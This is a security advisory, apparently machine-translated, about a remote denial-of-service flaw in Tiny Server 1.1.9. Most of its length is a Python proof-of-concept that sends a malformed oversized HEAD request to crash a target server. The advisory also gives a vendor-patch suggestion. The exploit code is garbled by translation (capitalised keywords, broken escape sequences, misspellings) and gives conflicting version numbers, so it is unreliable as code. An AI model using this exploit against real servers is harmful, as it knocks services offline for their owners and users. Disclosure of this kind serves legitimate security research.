Release date: 2012-03-20
Updated on: 2012-03-21
Affected Systems:
Tiny Server 1.1.9
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52635
Tiny Server is a basic HTTP Server.
Tiny Server has a remote denial of service vulnerability. After successful exploitation, remote attackers can cause the affected applications to crash.
<* Source: Brock Haun
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Brock Haun () provides the following test methods:
#! /Usr/bin/python
######################################## #######################################
# Overflow exploiting a vulnerability in Tiny Server <= 1.1.9 (HTTP) HEAD request.
# Date of Discovery: 3/19/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip
# Software Version: <= 1.1.9
# Target OS: Windows (Tested on Windows 7)
######################################## #######################################
Import httplib, sys
If (len (sys. argv )! = 3 ):
Print '\ n \ t [*] Usage:./' + sys. argv [0] + '<target
Host> <port>'
Sys. exit ()
Host = sys. argv [1]
Port = sys. argv [2]
Buffer = 'A' * 100 + 'HTTP/1.0 \ r \ N'
Print '\ n [*] ****************************** ****************'
Print '[*] Tiny Server <= 1.1.0 (HTTP) HEAD request overflow'
Print '[*] Written by Brock haun'
Print '[*] security.brockhaun@gmail.com'
Print '[*] ******************************** * ************* \ N'
Try:
Print '\ n \ t [*] Attempting connection .'
HttpServ = httplib. HTTPConnection (host, port)
HttpServ. connect ()
Print '\ n \ t [*] Connected .'
Print '\ n \ t [*] Sending crash buffer .'
HttpServ. request ('head', buffer)
Print '\ n \ t [*] Done! Target shoshould be unresponsive! '
Except t:
Print '\ n \ t [***] Connection error. Something went wrong .:('
HttpServ. close ()
Sys. exit ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Tiny Server
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://tinyserver.sourceforge.net/